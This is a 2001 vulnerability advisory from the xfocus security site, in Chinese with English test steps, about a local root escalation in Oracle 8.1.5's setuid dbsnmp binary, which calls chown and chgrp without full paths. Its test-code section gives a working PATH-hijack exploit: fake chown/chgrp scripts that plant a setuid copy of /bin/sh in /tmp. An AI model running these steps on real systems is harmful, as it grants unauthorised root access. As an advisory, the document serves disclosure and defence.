xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

Oracle 8.1.5 dbnsmp 存在漏洞


发布时间:2001-08-02
更新时间:2001-08-02
严重程度:
威胁程度:本地管理员权限
错误类型:设计错误
利用方式:服务器模式

受影响系统
Oracle 8.1.5
详细描述
Oracle 8.1.5的dbsnmp存在一个问题可以导致本地用户获得ROOT权利,
因为dbsnmp是以SETUID ROOT的身份安装,当用户执行dbsnmp时候调用
了chown 和chgrp,但是没有规定指定的路径,所以任意用户可以定义
他的PATH变量来利用这个漏洞。

测试代码
export PATH=~/bin/:$PATH


Then we create the file ~/bin/chown or ~/bin/chgrp:


#!/bin/sh
cp /bin/sh /tmp/XXX;chmod 4755 /tmp/XXX


(We have to put all in the same line, separated by semicolon)


We make our chown or chgrp executable:


chmod +x ~/bin/chown


chmod +x ~/bin/chgrp

解决方案
尚无

相关信息
Ismael Briones Vilar
ismael@el-mundo.net